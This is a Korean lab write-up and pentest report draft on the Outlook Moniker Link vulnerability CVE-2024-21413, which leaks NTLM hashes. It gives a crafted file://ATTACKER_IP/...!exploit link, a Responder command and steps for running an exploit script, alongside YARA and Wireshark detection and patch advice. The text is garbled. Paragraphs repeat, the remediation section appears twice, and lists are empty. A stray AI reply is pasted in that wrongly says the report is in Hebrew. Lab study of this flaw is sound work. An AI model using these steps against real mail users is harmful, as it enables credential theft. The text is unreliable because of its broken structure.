
2024년 2월 13일, Microsoft는 CVE-2024-21413으로 식별되며 Moniker Link Vulnerability로 알려진 Microsoft Outlook의 심각한 보안 취약점을 공개했습니다. 이 취약점을 통해 공격자는 Outlook의 Protected View 메커니즘을 우회할 수 있습니다.
2024년 2월 13일, Microsoft는 Microsoft Outlook에서 심각한 보안 취약점을 공개했습니다. 이 취약점은 CVE-2024-21413로 식별되며 Moniker Link Vulnerability로 알려져 있습니다. 이 취약점은 공격자가 Outlook의 Protected View 메커니즘을 우회할 수 있게 합니다.
훌륭합니다 👍
다음은 전체 번역 + 침투 테스트(PT) 보고서 작성이며, 전문적이고 명확한 히브리어로 작성되었습니다. 요청하신 대로 – 번역과 작성만 포함되어 있습니다. 답변, 스크린샷, 완성 내용은 직접 추가하시면 되고, 원하시면 나중에 도와드리겠습니다.
2024년 2월 13일, Microsoft는 Microsoft Outlook에서 심각한 보안 취약점을 공개했으며, 이 취약점은 CVE-2024-21413 식별자를 부여받았고 Moniker Link Vulnerability로 알려져 있습니다.
이 취약점은 특수 링크(Moniker Link)를 통해 공격자가 Outlook의 Protected View 메커니즘을 우회하고, 피해자의 Outlook 클라이언트가 로그인 자격 증명(NTLM hash) 을 공격자가 제어하는 서버로 보내도록 합니다 – 파일 실행이나 효과적인 보안 경고 없이 말입니다.
이 취약점은 자격 증명 유출로 이어질 수 있으며, 이론적으로는 원격 코드 실행(RCE) 가능성도 존재합니다.
| 매개변수 | 값 |
|---|---|
| 취약점 ID | CVE-2024-21413 |
| 게시 날짜 | 2024년 2월 13일 |
| 발견자 | Haifei Li – Check Point Research |
| 영향 | 자격 증명 유출 + 잠재적 RCE |
| 심각도 | Critical |
| 공격 복잡성 | 낮음 |
| CVSS 점수 | 9.8 |
| 공식 링크 | https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413 |
이 취약점은 다음 버전에 영향을 미칩니다:
(취약점 설명)

Microsoft Outlook은 HTML 형식의 이메일 표시와 http:// 및 https://와 같은 다양한 유형의 링크 분석을 지원합니다. 또한 Outlook은 Moniker Links라고 하는 특수 링크도 지원하며, 이를 통해 운영 체제에서 애플리케이션을 실행하거나 외부 리소스에 액세스할 수 있습니다.
정상적인 경우, 이메일에 외부 애플리케이션을 실행하거나 시스템 리소스(예: file:// 링크)에 접근하는 링크가 포함되어 있으면 Outlook의 보안 메커니즘인 Protected View가 활성화됩니다. 이 메커니즘은 보안 경고를 표시하고 코드 실행, 매크로 또는 외부 네트워크 리소스에 대한 접근과 같은 위험한 작업을 차단합니다.
그러나 Outlook(CVE-2024-21413)에서 Moniker Link 유형의 링크를 간단히 조작하여 Protected View 메커니즘을 우회할 수 있는 취약점이 발견되었습니다.
발견 사항 (Findings)
테스트 중에 일반적인 유형의 링크를 사용하면 다음이 확인되었습니다.
file://ATTACKER_IP/test
Outlook이 SMB 프로토콜을 통해 네트워크 리소스에 접근을 시도하게 만들지만, 이 시도는 Protected View에 의해 차단됩니다.
반면, 링크에 특수 문자 !와 추가 텍스트 문자열이 포함된 경우, 예를 들어:
file://ATTACKER_IP/test!exploit
Outlook은 Protected View를 실행하지 않고 원격 서버에 대한 연결을 시도합니다.
이 시도 과정에서:
원격 공유가 실제로 존재할 필요는 없다는 점에 유의하세요. 인증 시도는 어차피 수행되기 때문입니다.
영향 (Impact)
이 취약점을 통해 공격자는 다음을 수행할 수 있습니다:
또한 Moniker Links는 Windows의 COM(Component Object Model) 메커니즘을 사용하므로 이론적으로 원격 코드 실행(RCE) 가능성이 존재합니다. 그러나 테스트 시점 기준으로 이 취약점을 통한 실제 RCE 구현에 대한 공개 PoC(Proof of Concept)는 존재하지 않습니다.
취약점 악용 (Exploitation)
공격 시나리오에서 피해자에게 이전 작업에서 제시된 것과 유사한 Moniker Link가 포함된 이메일이 전송됩니다. 공격자의 목표는 Outlook의 Protected View 메커니즘을 우회하는 Moniker Link가 포함된 이메일을 만들어, 피해자가 링크를 클릭하는 즉시 피해자의 Outlook 클라이언트가 공격자의 머신에서 파일을 로드하도록 하는 것입니다. 이로 인해 피해자의 netNTLMv2 해시가 전송되어 공격자에게 캡처됩니다.
공격을 수행하기 전에 데모 목적으로 작성된 PoC(Proof of Concept)를 살펴보겠습니다. (GitHub에서도 확인할 수 있습니다.)
작성자: CMNatic | https://github.com/cmnatic 버전: 1.0 | 19/02/2024
코드는 Python을 사용하며 악성 Moniker Link가 포함된 HTML 이메일을 전송합니다.
PoC 설명
PoC:
실제 시나리오에서는 공격자가 제어하는 SMTP 서버가 필요합니다. (이 방에서는 서버가 이미 제공됩니다.)
해시 캡처를 위한 리스닝 – Responder
이메일을 보낸 후, SMB 요청을 캡처하기 위해 공격자 머신에서 Responder와 같은 리스닝 도구를 실행해야 합니다.
THM AttackBox에서 인터페이스 이름은 ens5입니다:
responder -I ens5
Responder는 SMB, LLMNR 및 NBT-NS 요청을 수신하며 인증 자격 증명을 캡처할 수 있게 합니다.
피해자 머신 열기
Exploit 실행
AttackBox에서:
10.64.165.67
그런 다음 실행합니다:
python3 exploit.py
비밀번호를 묻는 메시지가 표시되면 다음을 입력합니다:
attacker
작업이 성공하면 다음 메시지가 표시됩니다:
Email delivered
결과
피해자 머신에서 이메일을 열고 "Click me" 링크를 클릭하면:

탐지
YARA
Florian Roth가 작성한 YARA 규칙은 Moniker Link 내에 file:\ 요소가 포함된 이메일을 탐지하기 위한 것으로, 이는 CVE-2024-21413 악용 시도를 나타낼 수 있습니다.
YARA 규칙의 예(방에 표시된 대로):
이 규칙은 이메일의 일반적인 헤더(예: Subject: 및 Received:)를 검색합니다.
또한 UNC 경로(\)를 가리키는 file:// 링크의 의심스러운 패턴과 일반적인 파일 확장자, 그리고 끝에 있는 ! 문자(Protected View 우회 특성)를 검색합니다.
(코드 자체는 원본 그대로 유지됩니다)
Wireshark
또한 Wireshark의 패킷 캡처에서 피해자 머신에서 공격자 머신으로 나가는 SMB 요청을 볼 수 있습니다.
요청 과정에서:
수정
예방 및 강화 (Remediation)
Microsoft는 2월 Patch Tuesday 업데이트의 일부로 이 취약점을 해결하기 위한 보안 업데이트를 포함했습니다. Office 버전별 관련 KB 문서 목록은 Microsoft 공식 링크에서 확인할 수 있습니다.
다음 방법을 통해 Microsoft Office를 업데이트하는 것이 좋습니다:
또한 모든 시스템에 업데이트가 완료될 때까지 기본적인 정보 보안 관행을 적용하고, 특히 사용자 인식을 높이는 것이 중요합니다. 예를 들어:
이 취약점은 Outlook의 Protected View 메커니즘을 우회하므로 구성 변경만으로는 Outlook이 이 공격을 차단하도록 설정할 수 없습니다.
또한 SMB 프로토콜은 네트워크 리소스 및 파일 공유에 접근하는 데 필수적이므로 대부분의 조직에서 SMB를 완전히 차단하는 것은 권장되지 않습니다. 그러나 조직 정책과 네트워크 구조에 따라 방화벽 수준에서 차단 또는 제한을 구현할 수는 있습니다.
예방 및 강화 (Remediation)
Microsoft는 2월 Patch Tuesday 업데이트의 일부로 이 취약점에 대한 보안 수정 사항을 포함했습니다. Office 버전에 따른 관련 KB 문서 목록은 Microsoft 공식 링크에서 확인할 수 있습니다. Microsoft Office 업데이트를 강력히 권장합니다:
또한 모든 시스템에 업데이트가 적용될 때까지 기본적인 정보 보안 관행을 적용하고, 특히 사용자 인식을 높이는 것이 중요합니다. 예를 들어:
이 취약점은 Outlook의 Protected View 메커니즘을 우회하므로 Outlook 자체의 구성 변경만으로는 공격을 방지할 수 없습니다.
또한 SMB 프로토콜은 파일 공유 및 네트워크 리소스에 접근하는 데 필수적이므로 대부분의 조직에서 SMB를 완전히 차단하는 것은 권장되지 않습니다. 그러나 보안 정책과 기업 네트워크 구조에 따라 방화벽 수준에서 제한 또는 차단을 구현할 수는 있습니다.